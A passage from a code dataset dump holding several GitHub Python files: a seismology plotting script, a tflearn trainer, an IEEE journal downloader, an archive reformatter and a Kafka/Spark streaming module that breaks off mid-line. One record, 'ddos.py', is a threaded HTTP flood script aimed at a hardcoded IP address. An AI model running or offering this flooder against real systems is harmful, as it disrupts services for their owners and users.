getattr(data_from, data_block_type) if name == data_block_name]\n )\n rez = getattr(data_to, data_block_type)[:] # list of data block names\n return rez\n","repo_name":"Korchy/BIS","sub_path":"data_block_manager.py","file_name":"data_block_manager.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"23399189155","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# by TR\n\"\"\"\nstack and plot rfs by azimuth\n\n\"\"\"\nfrom sito import read, imaging\nfrom glob import glob\nimport matplotlib.pyplot as plt\nfrom matplotlib import colors\nimport numpy as np\nfrom matplotlib.colorbar import ColorbarBase\n\npath = '/home/richter/Results/IPOC/receiver/2012_mag5.5/'\nazi_path = path + '/azi_stack/'\nplotdir = azi_path + 'plots/'\n\ndef getFig(num=0, ratio=1.5, margin=None, **kwargs):\n axes = [1. - 0.1 * num] + [0.1] * num\n if margin == None:\n margin = [1.7, 1.3, 1.1, 0.3] #left, rigth, bottom, top\n fig = imaging.getFigure(axes, width=15., margin=margin, ratio=ratio,\n fontsize=12, labelsize='small', **kwargs)\n return fig\n\n\ndef cosmetic(station, fig):\n bins = np.arange(18) * 20 + 10\n if station in ('PB01'):\n fig.axes[0].set_yticks(bins)\n fig.axes[0].set_yticks((), minor=True)\n fig.axes[0].set_yticklabels([str(bi) * ((i + 1) % 2)\n for i, bi in enumerate(bins)])\n fig.axes[0].set_ylim((-20, 380))\n\ndef plot(station='*'):\n start = -5\n end = 22\n show = False\n for file_ in glob(azi_path + station + '_azi_stack.QHD'):\n ms = read(file_)\n station = ms[0].stats.station\n ratio = (len(ms) * 0.5 + 1.4 + 0.4 * 2.54) / 15\n ratio = min(ratio, 2.)\n fig = getFig(ratio=ratio)\n alpha = None\n num_tr = np.sum(np.array(ms.getHI('count')))\n if num_tr >= 100:\n alpha = ['count', 20, 0, 1., 0.]\n elif num_tr >= 50:\n alpha = ['count', 10, 0, 1., 0.]\n else:\n alpha = ['count', 5, 0, 1., 0.]\n plot = ms.plotRF(start, end, yaxis='azi', ylabel=u'azi (°)', show=show,\n fig=fig, scale=360 / len(ms), plotinfo=('sum',), plotinfowhere=('top',),\n alpha=alpha)\n if alpha is not None:\n #http://matplotlib.sourceforge.net/examples/api/colorbar_only.html\n ax2 = plot.fig.add_axes([0.94, 0.2, 0.01, 0.6])\n norm = colors.Normalize(vmin=0, vmax=alpha[1])\n ColorbarBase(ax2, cmap='Greys', norm=norm, extend='max')\n cosmetic(station, plot.fig)\n plot.fig.savefig(plotdir + 'rf_azistack_%s_Q.pdf' % station)\n plt.close(plot.fig)\n\ndef calculate(station='*'):\n for file_ in glob(path + station + '_mout.QHD'):\n ms = read(file_).select(component='Q', expr='not st.mark')\n station = ms[0].stats.station\n if len(ms) >= 100:\n bins = np.arange(19) * 20\n elif len(ms) >= 50:\n bins = np.arange(13) * 30\n else:\n bins = np.arange(7) * 60\n ms = ms.getBinnedStream(bins, header='azi')\n ms.write(azi_path + '%s_azi_stack' % station, 'Q')\n\ncalculate()\nplot()\n","repo_name":"trichter/sito","sub_path":"bin/rf/rf_stack_azi.py","file_name":"rf_stack_azi.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"6463315085","text":"import numpy as np\nimport tflearn\n\n# Load CSV file, indicate that the first column represents labels\nfrom tflearn.data_utils import load_csv\ndata, labels = load_csv('cyprus_train_model.csv', target_column=0,\n categorical_labels=True, n_classes=6)\n\n# Build neural network\n# 9 inputs (3 areas for 3 previous days)\nnet = tflearn.input_data(shape=[None, 9])\nnet = tflearn.fully_connected(net, 32)\nnet = tflearn.fully_connected(net, 32)\n# 6 possible outputs\nnet = tflearn.fully_connected(net, 6, activation='softmax')\nnet = tflearn.regression(net)\n\n# Define model\nmodel = tflearn.DNN(net, tensorboard_verbose=3)\n# Start training (apply gradient descent algorithm)\nmodel.fit(data, labels, n_epoch=10, batch_size=16, show_metric=True)\n\nmodel.save(\"cyprus.tflearn\")\n","repo_name":"valentinalexeev/2018SAC-airalert","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17124427843","text":"import functools\nimport shutil\n\nfrom datetime import datetime\nfrom pathlib import Path\nfrom typing import List, Optional\n\nimport requests\n\nfrom ieee_csdl_downloader.config import debug_mode, get_download_dir, get_download_start_year, get_ieee_csdl_cookies, get_ieee_spectrum_cookies\nfrom ieee_csdl_downloader.constants import GRAPH_QL_QUERY, TODAY\nfrom ieee_csdl_downloader.data import get_pub_formats, get_pub_month\nfrom ieee_csdl_downloader.pdf import unzip_and_merge\nfrom ieee_csdl_downloader.publications import Publication\n\n\ndef download_file(\n download_url: str,\n download_path: Optional[Path] = None,\n cookies: Optional[dict] = None,\n) -> None: # pragma: nocover\n if not download_path:\n download_path = Path(get_download_dir() / download_url.split('/')[-1].split('?')[0])\n\n with requests.get(download_url, stream=True, cookies=cookies) as r:\n with open(download_path, 'wb') as f:\n # See the below links:\n # - https://stackoverflow.com/questions/16694907/download-large-file-in-python-with-requests#comment95588469_39217788\n # - https://github.com/psf/requests/issues/2155#issuecomment-50771010\n r.raw.read = functools.partial(r.raw.read, decode_content=True)\n\n shutil.copyfileobj(r.raw, f)\n\n\ndef get_publication_directory(pub_name: str):\n return Path(get_download_dir() / pub_name)\n\n\ndef get_local_filename(\n year: int,\n month: str,\n pub_name: str,\n vol: str,\n issue: int,\n filetype: str,\n postfix: str = '',\n) -> Path:\n filename = f'{year}-{month} - {pub_name} - Volume{vol} - Issue{issue}{postfix}.{filetype}'\n return get_publication_directory(pub_name) / filename\n\n\ndef get_publication_graphql(year: int, issue: int, publication: Publication) -> dict: # pragma: nocover\n # GraphQL query to get the month of the publication\n r = requests.post(\n url='https://www.computer.org/csdl/api/v1/graphql',\n json={\n 'operationName': None,\n 'variables': {\n 'announcementsCategoryId': '819',\n 'cfpCategoryId': '857',\n 'idPrefix': publication.url_indicator,\n 'issueNum': str(issue).zfill(2),\n 'year': str(year),\n 'limitResults': 100,\n 'skipResults': 0,\n },\n 'query': GRAPH_QL_QUERY,\n },\n allow_redirects=True,\n cookies=get_ieee_csdl_cookies(),\n )\n json_data = r.json()\n return json_data\n\n\ndef download_publications_from_ieee_csdl() -> None: # pragma: nocover\n get_download_dir().mkdir(parents=True, exist_ok=True)\n\n download_problems: List[str] = []\n\n for pub in Publication.from_config():\n\n # Create the directory for this publication\n get_publication_directory(pub_name=pub.name).mkdir(exist_ok=True)\n\n years = [2022] if debug_mode() else range(pub.start_year, (pub.end_year if pub.end_year else TODAY.year) + 1)\n # Iterate over all the desired years & issues to get the media.\n for year in years:\n\n if get_download_start_year() and year < get_download_start_year():\n print(f'[{datetime.now().isoformat()}] Skipping {year} for {pub.name}; config says last download was {get_download_start_year()}')\n continue\n\n for issue in pub.issues:\n json_data = get_publication_graphql(year=year, issue=issue, publication=pub)\n pub_month = get_pub_month(json_data=json_data)\n pub_formats = get_pub_formats(json_data=json_data)\n if not pub_month:\n continue\n month = str(pub_month).zfill(2)\n\n file_fn = lambda file_type, postfix='': get_local_filename( # noqa: E731\n year=year,\n month=month,\n pub_name=pub.name,\n vol=str(year - (pub.start_year - 1)).zfill(2),\n issue=issue,\n filetype=file_type,\n postfix=postfix,\n )\n\n # Download each of the desired files.\n for filetype in pub_formats:\n print(f'[{datetime.now().isoformat()}] Downloading [{pub.name}] issue ' f'for {year}-{month} (Issue {issue} - {filetype:4})...', end='')\n url = build_download_url(pub, year, issue, filetype)\n\n local_file = file_fn(file_type=filetype)\n\n # Minus 1 from month because sometimes issues are published a bit early.\n if year >= TODAY.year and int(month) - 1 > TODAY.month:\n print('Future Issue; skipping!')\n continue\n\n if local_file.exists():\n print('Already Downloaded; skipping!')\n continue\n\n r = requests.head(\n url=url,\n allow_redirects=True,\n cookies=get_ieee_csdl_cookies(),\n )\n if r.status_code == 403:\n print('File does not exist; skipping!')\n continue\n\n if r.status_code != 200:\n print('Status Code != 200; skipping!\\n')\n print('[ERROR] Please try updating the value of `CSDL_AUTH_COOKIE` and re-running the program.')\n print('Exiting.')\n exit(1)\n\n redirected_url = r.url\n download_file(download_url=redirected_url, download_path=local_file)\n print('Success!')\n\n # If the zip file exists, but not the PDF; create zip\n pdf = file_fn(file_type='pdf')\n zip = file_fn(file_type='zip')\n if zip.exists() and not pdf.exists():\n timestamp = datetime.now().isoformat()\n print(f'[{timestamp}] No PDF downloaded for {year}-{month} (Issue {issue})...')\n print(f'[{timestamp}] \\\\------ extracting zip and creating...', end='')\n\n merged_pdf_name = file_fn(file_type='pdf', postfix=' - MERGED_FROM_ZIP')\n if merged_pdf_name.exists():\n print('Merged PDF exists; skipping!')\n continue\n\n unzip_and_merge(merged_pdf_name, zip)\n print('Success!')\n\n if download_problems:\n print('Problems Downloading:')\n print('===================')\n for download_problem in download_problems:\n print(f' - {download_problem}')\n\n\ndef build_download_url(pub, year, issue, filetype):\n url = f'https://www.computer.org/csdl/api/v1/periodical/{pub.type}/{pub.url_indicator}' f'/{year}/{str(issue).zfill(2)}/download-issue/{filetype}'\n return url\n\n\ndef download_ieee_spectrum(): # pragma: nocover\n r = requests.get(\n url='https://spectrum.ieee.org/core/users/settings.js',\n cookies=get_ieee_spectrum_cookies(),\n )\n\n if r.status_code != 200:\n print('Status Code != 200; skipping downloading IEEE Spectrum!\\n')\n print('[ERROR] Please try updating the value of `IEEE_SPECTRUM_SESSIONID` and re-running the program.')\n print('Exiting.')\n exit(1)\n\n pages = r.json().get('parent_site', {}).get('pages', [])\n filtered_pages = filter(\n lambda page: (\n page.get('about_html').endswith('.pdf')\n and '/files/' in page.get('about_html')\n and (page.get('isPublic', False) is True or page.get('isUnlisted', False) is True)\n ),\n pages,\n )\n sorted_filtered_pages = list((sorted(filtered_pages, key=lambda d: datetime.strptime(d['title'], '%B %Y'))))\n for page in sorted_filtered_pages:\n about_html = page.get('about_html')\n download_url = about_html if about_html.startswith('https://') else f'https://spectrum.ieee.org{about_html}'\n\n title = page['title']\n file_date = datetime.strptime(title, '%B %Y')\n\n if get_download_start_year() and file_date.year < get_download_start_year():\n print(f'[{datetime.now().isoformat()}] Skipping {file_date.year} for IEEE Spectrum; config says last download was {get_download_start_year()}')\n continue\n\n filename = f'{file_date.year}-{str(file_date.month).zfill(2)} - IEEE Spectrum - {title}.pdf'\n download_path = Path(f'{get_download_dir()}/IEEE Spectrum/{filename}').absolute()\n\n if download_path.exists():\n print(f'Skipping [{download_path}]; file exists.')\n continue\n\n print(f'Downloading [{download_url}] to [{download_path}]')\n download_file(download_url=download_url, download_path=download_path, cookies=get_ieee_spectrum_cookies())\n\n\n# RUN VIA: `source activate && python3 -m ieee_csdl_downloader.download && deactivate`\nif __name__ == '__main__': # pragma: nocover\n download_publications_from_ieee_csdl()\n download_ieee_spectrum()\n","repo_name":"ChrisCarini/ieee-csdl-downloader","sub_path":"ieee_csdl_downloader/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10194659662","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\nimport os\nimport argparse\n\nfrom cocoprep.archive_load_data import create_path, get_file_name_list, parse_old_arhive_file_name, parse_range\nfrom cocoprep.archive_exceptions import PreprocessingException, PreprocessingWarning\n\n\n# noinspection PyTypeChecker\ndef reformat_archives(input_path, output_path, functions, instances, dimensions):\n \"\"\"\n The names of the files in the input_path have the following notation:\n f[f1]-[f2]_i[i1]-[i2]_[d]D.txt\n where f1 and f2 are function numbers used for the first and second objective, i1 and i2 are instance numbers of the\n two functions and d is the dimension (one among 2, 3, 5, 10 and 20). Each such file starts with a few lines of\n comments that start with '#', after which each line corresponds to one solutions. In files with d <= 5 the solution\n is represented by its decision and objective vector values, while files with d > 5 contain only objective vector\n values of each solution.\n\n The output files to be written to output_path have the following notation:\n [suite_name]_f[F]_i[I]_d[D]_nondominated.adat\n where F is the function number in the suite, I is the instance number and D is the dimension. One file contains\n only one instance and starts with a line '% instance = I', where I is the instance number and is followed by a\n commented line (starting with '%'). In the subsequent lines, the solutions are written in the following format:\n num obj1 obj2 dec1 ... decn\n where num is the evaluation number of the solution (0 for extreme solutions and 1 for solutions read from the old\n file format), obj1 and obj2 are its objective values, and dec1, ... are its decision values (if they are given).\n\n Note this implementation is concerned only with the 'bbob-biobj' suite and applies reformatting only on the archive\n files that correspond to the problems contained in this suite.\n\n :param input_path: path to the folder with input archives\n :param output_path: path to the folder where output archives are stored to, if any files already exist there, they\n get appended to\n :param functions: list of function numbers to be included in the reformatting\n :param instances: list of instance numbers to be included in the reformatting\n :param dimensions: list of dimensions to be included in the reformatting\n \"\"\"\n suite_name = 'bbob-biobj'\n print('Reformatting archive files for the {} suite...'.format(suite_name))\n\n # Check whether input path exists\n input_files = get_file_name_list(input_path, \".txt\")\n if len(input_files) == 0:\n raise PreprocessingException('Folder {} does not exist or is empty'.format(input_path))\n\n # Create output folder if it does not exist yet\n create_path(output_path)\n\n # Read the input files one by one\n for input_file in input_files:\n\n try:\n (function, instance, dimension) = parse_old_arhive_file_name(input_file)\n if (function not in functions) or (instance not in instances) or (dimension not in dimensions):\n continue\n except PreprocessingWarning as warning:\n print('Skipping file {}\\n{}'.format(input_file, warning))\n continue\n\n # Open the output file\n output_file = os.path.join(output_path, '{}_f{:02d}_i{:02d}_d{:02d}_nondominated.adat'.format(suite_name,\n function,\n instance,\n dimension))\n\n with open(input_file, 'r') as f_in:\n with open(output_file, 'a') as f_out:\n # Perform reformatting\n\n print(input_file)\n f_out.write('% instance = {}\\n%\\n'.format(instance))\n\n for line in f_in:\n if line[0] == '#':\n continue\n\n if dimension <= 5:\n f_out.write('1 \\t{} \\t{}\\n'.format(' \\t'.join(line.split()[dimension:dimension+2]),\n ' \\t'.join(line.split()[0:dimension])))\n else:\n f_out.write('1 \\t{}\\n'.format(' \\t'.join(line.split()[0:2])))\n\n f_out.close()\n f_in.close()\n print('Done!')\n\n\nif __name__ == '__main__':\n \"\"\"Performs reformatting of the archives of solutions from the old format (by Do) to the new one.\n\n Archives from the input path are read, reformatted and stored in the output path.\n \"\"\"\n import timing\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--functions', type=parse_range, default=range(1, 56),\n help='function numbers to be included in the processing of archives')\n parser.add_argument('-i', '--instances', type=parse_range, default=range(1, 11),\n help='instance numbers to be included in the processing of archives')\n parser.add_argument('-d', '--dimensions', type=parse_range, default=[2, 3, 5, 10, 20, 40],\n help='dimensions to be included in the processing of archives')\n parser.add_argument('output', help='path to the output folder')\n parser.add_argument('input', help='path to the input folder')\n args = parser.parse_args()\n\n print('Program called with arguments: \\ninput folder = {}\\noutput folder = {}'.format(args.input, args.output))\n print('functions = {} \\ninstances = {}\\ndimensions = {}\\n'.format(args.functions, args.instances, args.dimensions))\n\n # Reformat the archives\n reformat_archives(args.input, args.output, args.functions, args.instances, args.dimensions)\n","repo_name":"numbbo/coco","sub_path":"code-preprocessing/archive-update/archive_reformat.py","file_name":"archive_reformat.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"37"} +{"seq_id":"72239650666","text":"import socket # USED TO CREATE CLIENT-SEVRER APPS\nimport threading\n\n# setting target ip\ntarget = '192.168.0.19'\nfake_ip = '182.15.20.8'\nport = 80 # shut down http port\n\ndef attack():\n while True:\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n# AF_INET is the Internet address family for IPv4. SOCK_STREAM is the socket type for TCP, the protocol that will be used to transport messages in the network.\n s.connect((target, port)) # uses .connect() to connect to the server (victim)\n s.sendto((\"GET /\" + target + \" HTTP/1.1\\r\\n\").encode('ascii'), (target, port))\n s.sendto((\"Host: \" + fake_ip + \"\\r\\n\\r\\n\").encode('ascii'), (target, port))\n global attack_num\n attack_num += 1\n print(attack_num)\n s.close()\n# By using multi-threading, we can send many requests at once\nfor i in range(500):\n thread = threading.Thread(target=attack)\n thread.start()\n","repo_name":"ferrindsouza/ferrindsouza.github.io","sub_path":"ddos.py","file_name":"ddos.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39425386111","text":"import time\nimport shutil\nimport sys\nfrom pyspark import SparkContext, SparkConf\n#from core import CC\n#from core.kafka_consumer import spark_kafka_consumer\n#from core.kafka_to_cc_storage_engine import kafka_to_db\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.sql import SparkSession, SQLContext\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\nfrom pyspark.ml.feature import Tokenizer, RegexTokenizer, StopWordsRemover, CountVectorizer\n\n##########################################\nimport json\nimport os\nimport imp\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream\nfrom datetime import datetime\nfrom cerebralcortex.kernel.utils.logging import cc_log\nfrom threading import Thread\nfrom importlib import import_module\n\n###################################\nfrom cerebralcortex.CerebralCortex import CerebralCortex\n\n#Sandeep: Give path to .yml file of APIServer\nconfiguration_file = os.path.join(os.path.dirname(__file__), 'cerebralcortex_apiserver.yml')\nCC = CerebralCortex(configuration_file, time_zone=\"America/Los_Angeles\", load_spark=False)\n\n################################## Global variables\n# filelist = []\n# cur_time = 1513236910 #hard coded, should use datetime.now() in the future\n# let user define start time\n\n###################################\nfrom pyspark.streaming.kafka import KafkaDStream\n#from core.kafka_offset import storeOffsetRanges\nfrom cerebralcortex.kernel.utils.logging import cc_log\n\ndef verify_fields(msg):\n if \"metadata\" in msg and \"data\" in msg:\n# print(\"Batch size \" + str(len(msg[\"data\"])))\n return True\n return False\n\ndef store_streams(data):\n try:\n st = datetime.datetime.now()\n CC.save_datastream_to_influxdb(data)\n CC.save_datastream(data, \"json\")\n print(\"Stream Saved: \", data['filename'], (datetime.datetime.now()-st))\n except:\n cc_log()\n\n# def kafka_to_db(message: KafkaDStream):\n# \"\"\"\n#\n# :param message:\n# \"\"\"\n# records = message.map(lambda r: json.loads(r[1]))\n# valid_records = records.filter(verify_fields)\n#\n# valid_records.foreach(lambda stream_data: store_streams(stream_data))\n#\n# storeOffsetRanges(message)\n#\n# print(\"Ready to process stream...\")\n##################################\n\n#util module files\nimport gzip\nfrom pympler import asizeof\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream, DataPoint\nfrom dateutil.parser import parse\n\n\ndef get_gzip_file_contents(file_name: str) -> str:\n \"\"\"\n Read and return gzip compressed file contents\n :param file_name:\n :return:\n \"\"\"\n fp = gzip.open(file_name)\n gzip_file_content = fp.read()\n fp.close()\n gzip_file_content = gzip_file_content.decode('utf-8')\n return gzip_file_content\n\n\ndef chunks(data: str, max_len: int) -> str:\n \"\"\"\n Yields max_len sized chunks with the remainder in the last\n :param data:\n :param max_len:\n \"\"\"\n for i in range(0, len(data), max_len):\n yield data[i:i + max_len]\n\n\ndef get_chunk_size(data):\n\n if len(data) > 0:\n chunk_size = 750000/(asizeof.asizeof(data)/len(data)) #0.75MB chunk size without metadata\n return round(chunk_size)\n else:\n return 100\n\n\ndef row_to_datapoint(row: str) -> dict:\n \"\"\"\n Format data based on mCerebrum's current GZ-CSV format into what Cerebral\n Cortex expects\n :param row:\n :return:\n \"\"\"\n ts, offset, values = row.split(',', 2)\n ts = int(ts) / 1000.0\n offset = int(offset)\n\n if isinstance(values, tuple):\n values = list(values)\n else:\n try:\n values = json.loads(values)\n except:\n try:\n values = [float(values)]\n except:\n try:\n values = list(map(float, values.split(',')))\n except:\n values = values\n\n timezone = datetime.timezone(datetime.timedelta(milliseconds=offset))\n ts = datetime.datetime.fromtimestamp(ts, timezone)\n return DataPoint(start_time=ts, sample=values)\n #return {'starttime': str(ts), 'value': values}\n\n\ndef rename_file(old: str):\n \"\"\"\n\n :param old:\n \"\"\"\n old_file_name = old.rsplit('/', 1)[1]\n new_file_name = \"PROCESSED_\" + old_file_name\n new_file_name = str.replace(old, old_file_name, new_file_name)\n # if os.path.isfile(old):\n # os.rename(old, new_file_name)\n\n##########################\ndef json_to_datapoints(json_obj):\n if isinstance(json_obj[\"value\"], str):\n sample = json_obj[\"value\"]\n else:\n sample = json.dumps(json_obj[\"value\"])\n start_time = parse(json_obj[\"starttime\"])\n\n if \"endtime\" in json_obj: # Test-code, this if will not be executed\n return DataPoint(start_time=start_time, end_time=json_obj[\"endtime\"], sample=sample)\n else:\n return DataPoint(start_time=start_time, sample=sample)\n\n\ndef json_to_datastream(json_obj, stream_type):\n data = json_obj[\"data\"]\n metadata = json_obj[\"metadata\"]\n identifier = metadata[\"identifier\"]\n owner = metadata[\"owner\"]\n name = metadata[\"name\"]\n data_descriptor = metadata[\"data_descriptor\"]\n execution_context = metadata[\"execution_context\"]\n annotations = metadata[\"annotations\"]\n stream_type = stream_type\n start_time = data[0][\"starttime\"]\n end_time = data[len(data) - 1][\"starttime\"]\n datapoints = list(map(json_to_datapoints, data))\n\n return DataStream(identifier,\n owner,\n name,\n data_descriptor,\n execution_context,\n annotations,\n stream_type,\n start_time,\n end_time,\n datapoints)\n\n#################################\nfrom cerebralcortex.kernel.datatypes.datastream import DataStream\nfrom datetime import datetime\nfrom cerebralcortex.kernel.utils.logging import cc_log\n#from core.kafka_offset import storeOffsetRanges\nfrom pyspark.streaming.kafka import KafkaUtils, KafkaDStream, OffsetRange, TopicAndPartition\nfrom pyspark.sql import Row, SparkSession\n#from util.util import row_to_datapoint, chunks, get_gzip_file_contents, rename_file\n\n\ndef verify_fields(msg: dict, data_path: str) -> bool:\n \"\"\"\n Verify whether msg contains file name and metadata\n :param msg:\n :param data_path:\n :return:\n \"\"\"\n if \"metadata\" in msg and \"filename\" in msg:\n if os.path.isfile(data_path + msg[\"filename\"]):\n return True\n return False\n\n\ndef file_processor(msg: dict, data_path: str) -> DataStream:\n \"\"\"\n :param msg:\n :param data_path:\n :return:\n \"\"\"\n if not isinstance(msg[\"metadata\"],dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n identifier = metadata_header[\"identifier\"]\n owner = metadata_header[\"owner\"]\n name = metadata_header[\"name\"]\n data_descriptor = metadata_header[\"data_descriptor\"]\n execution_context = metadata_header[\"execution_context\"]\n if \"annotations\" in metadata_header:\n annotations = metadata_header[\"annotations\"]\n else:\n annotations={}\n if \"stream_type\" in metadata_header:\n stream_type = metadata_header[\"stream_type\"]\n else:\n stream_type = \"ds\"\n\n try:\n gzip_file_content = get_gzip_file_contents(data_path + msg[\"filename\"])\n datapoints = list(map(lambda x: row_to_datapoint(x), gzip_file_content.splitlines()))\n rename_file(data_path + msg[\"filename\"])\n\n start_time = datapoints[0].start_time\n end_time = datapoints[len(datapoints) - 1].end_time\n\n return DataStream(identifier,\n owner,\n name,\n data_descriptor,\n execution_context,\n annotations,\n stream_type,\n start_time,\n end_time,\n datapoints)\n except Exception as e:\n error_log = \"In Kafka preprocessor - Error in processing file: \" + str(msg[\"filename\"])+\" Owner-ID: \"+owner + \"Stream Name: \"+name + \" - \" + str(e)\n cc_log(error_log, \"MISSING_DATA\")\n datapoints = []\n return None\n\n\ndef store_stream(data: DataStream):\n \"\"\"\n Store data into Cassandra, MySQL, and influxDB\n :param data:\n \"\"\"\n if data:\n try:\n c1 = datetime.now()\n CC.save_datastream(data,\"datastream\")\n e1 = datetime.now()\n CC.save_datastream_to_influxdb(data)\n i1 = datetime.now()\n print(\"Cassandra Time: \", e1-c1, \" Influx Time: \",i1-e1, \" Batch size: \",len(data.data))\n except:\n cc_log()\n\n\ndef kafka_file_to_json_producer(message: KafkaDStream, data_path):\n \"\"\"\n Read convert gzip file data into json object and publish it on Kafka\n :param message:\n \"\"\"\n records = message.map(lambda r: json.loads(r[1]))\n valid_records = records.filter(lambda rdd: verify_fields(rdd, data_path))\n results = valid_records.map(lambda rdd: file_processor(rdd, data_path)).map(\n store_stream)\n\n storeOffsetRanges(message)\n\n print(\"File Iteration count:\", results.count())\n\n#################################\ndef storeOffsetRanges(rdd):\n offsetRanges = rdd.offsetRanges()\n for offsets in offsetRanges:\n try:\n CC.store_or_update_Kafka_offset(offsets.topic, offsets.partition, offsets.fromOffset, offsets.untilOffset)\n except:\n cc_log()\n\n################################\ndef spark_kafka_consumer(kafka_topic: str, ssc, broker, consumer_group_id) -> KafkaDStream:\n \"\"\"\n supports only one topic at a time\n :param kafka_topic:\n :return:\n \"\"\"\n try:\n offsets = CC.get_kafka_offsets(kafka_topic[0])\n offsets = False # when out of range, reset\n if bool(offsets):\n fromOffset = {}\n for offset in offsets:\n offset_start = offset[\"offset_start\"]\n offset_until = offset[\"offset_until\"]\n topic_partition = offset[\"topic_partition\"]\n topic = offset[\"topic\"]\n\n topicPartion = TopicAndPartition(topic,int(topic_partition))\n fromOffset[topicPartion] = int(offset_start)\n\n return KafkaUtils.createDirectStream(ssc, kafka_topic,\n {\"metadata.broker.list\": broker,\n \"group.id\": consumer_group_id},fromOffsets=fromOffset)\n else:\n offset_reset = \"largest\" # smallest OR largest\n return KafkaUtils.createDirectStream(ssc, kafka_topic,\n {\"metadata.broker.list\": broker, \"auto.offset.reset\":offset_reset,\n \"group.id\": consumer_group_id})\n except Exception as e:\n print(e)\n\n##################################\n## Virtual Sensor ##\n##################################\n## User Defined Query Start ##\n\n# Lazily instantiated global instance of SparkSession\ndef getSparkSessionInstance():\n if (\"sparkSessionSingletonInstance\" not in globals()):\n globals()[\"sparkSessionSingletonInstance\"] = SparkSession.builder.appName(\"Cerebral-Cortex\").getOrCreate()\n\n return globals()[\"sparkSessionSingletonInstance\"]\n\n\ndef verify_sid(msg: dict, sid: str, data_path: str) -> bool:\n if not isinstance(msg[\"metadata\"], dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n identifier = metadata_header[\"identifier\"] # unique identifier\n\n if identifier == sid:\n return True\n return False\n\n\ndef row_to_datapoint_cus(row: str):\n ts, offset, values = row.split(', ', 2)\n # ts = int(ts) / 1000.0\n ts = int(ts)\n offset = int(offset)\n\n # if isinstance(values, tuple):\n # values = list(values)\n # else:\n # try:\n # values = json.loads(values)\n # except:\n # try:\n # values = [float(values)]\n # except:\n # try:\n # values = list(map(float, values.split(',')))\n # except:\n # values = values\n\n # timezone = datetime.timezone(datetime.timedelta(milliseconds=offset))\n ts = datetime.fromtimestamp(ts)\n # return DataPoint(start_time=ts, sample=values)\n return {'time':str(ts), 'value':list(eval(values))}\n\n# first level filtering, send valid file to structured streaming folder\ndef extract_info(msg: dict, data_path: str, v_path: str):\n global cur_time\n\n if not isinstance(msg[\"metadata\"], dict):\n metadata_header = json.loads(msg[\"metadata\"])\n else:\n metadata_header = msg[\"metadata\"]\n\n try:\n filename = msg[\"filename\"]\n # sid\n identifier = metadata_header[\"identifier\"]\n dir_name = v_path+identifier+'/'\n\n #owner = \"fbf8d50c-7f1d-47aa-b958-9caeadc676bd\"#metadata_header[\"owner\"]\n #name = metadata_header[\"name\"]\n #data_descriptor = metadata_header[\"data_descriptor\"]\n #execution_context = metadata_header[\"execution_context\"]\n gzip_file_content = get_gzip_file_contents(data_path + msg[\"filename\"])\n\n datapoints = list(map(lambda x: row_to_datapoint_cus(x), gzip_file_content.splitlines()))\n #print(datapoints)\n start_time = datapoints[0][\"time\"]\n end_time = datapoints[len(datapoints) - 1][\"time\"]\n\n # in the window, add into queue\n end_time = datetime.strptime(end_time, \"%Y-%m-%d %H:%M:%S\")\n end_time = datetime.timestamp(end_time)\n\n # cur_time is user defined start time\n if end_time >= cur_time:\n # move file to virtual sensor data folder + sid\n shutil.copy(os.path.join(data_path, filename), dir_name)\n return filename\n # filelist.append(filename)\n\n return None\n # if len(filelist) != 0:\n # return [len(filelist)]\n\n #return [identifier, owner, name, data_descriptor, start_time, end_time, datapoints] #list of dictionary\n #return [0, owner, \"name\", \"data_descriptor\", start_time, end_time, datapoints]\n\n # return valid file name instead\n # return datapoints\n\n\n except Exception as e:\n # error_log = \"In Kafka preprocessor - Error in processing file: \" + str(msg[\"filename\"])+\" Owner-ID: \"+owner + \"Stream Name: \"+name + \" - \" + str(e)\n # cc_log(error_log, \"MISSING_DATA\")\n # datapoints = []\n print(e)\n return None\n\n\n########## test dynamic import ##############\n# def process(data: list):\n# # print(\"========= %s =========\" % str(time))\n# try:\n# print(\"====== In process ======\")\n# # Get the singleton instance of SparkSession\n# spark = getSparkSessionInstance()\n# data = data.collect()\n# rdd = spark.sparkContext.parallelize(data[0])\n# # test dynamic import\n# method(rdd)\n#\n# # # ====== original ===== #\n# # rowRDD = rdd.map(lambda w: Row(time=w[\"time\"], value=w[\"value\"]))\n# # df = spark.createDataFrame(rowRDD)\n# # df.show()\n# # # ====== deprecated ===== #\n# # # test = data.collect()\n# # # rdd = spark.sparkContext.parallelize(test[0])\n# # # df = rdd.toDF()\n# #\n# # ##### Example process\n# # df.select(mean(df[\"value\"][0]), mean(df[\"value\"][1]), mean(df[\"value\"][2])).show()\n# # df.select(max(df[\"value\"][0]), max(df[\"value\"][1]), max(df[\"value\"][2])).show()\n#\n# except Exception as e:\n# print(e)\n\n\ndef process_valid_file(message: KafkaDStream, data_path: str, v_path: str, sensor_id: str, interval: int):\n \"\"\"\n Read convert gzip file data into json object and publish it on Kafka\n :param message:\n \"\"\"\n\n # print(\"====== Processing in process_valid_file ======\")\n records = message.map(lambda r: json.loads(r[1])) # matadata & filename\n # print(records.collect())\n valid_records = records.filter(lambda rdd: 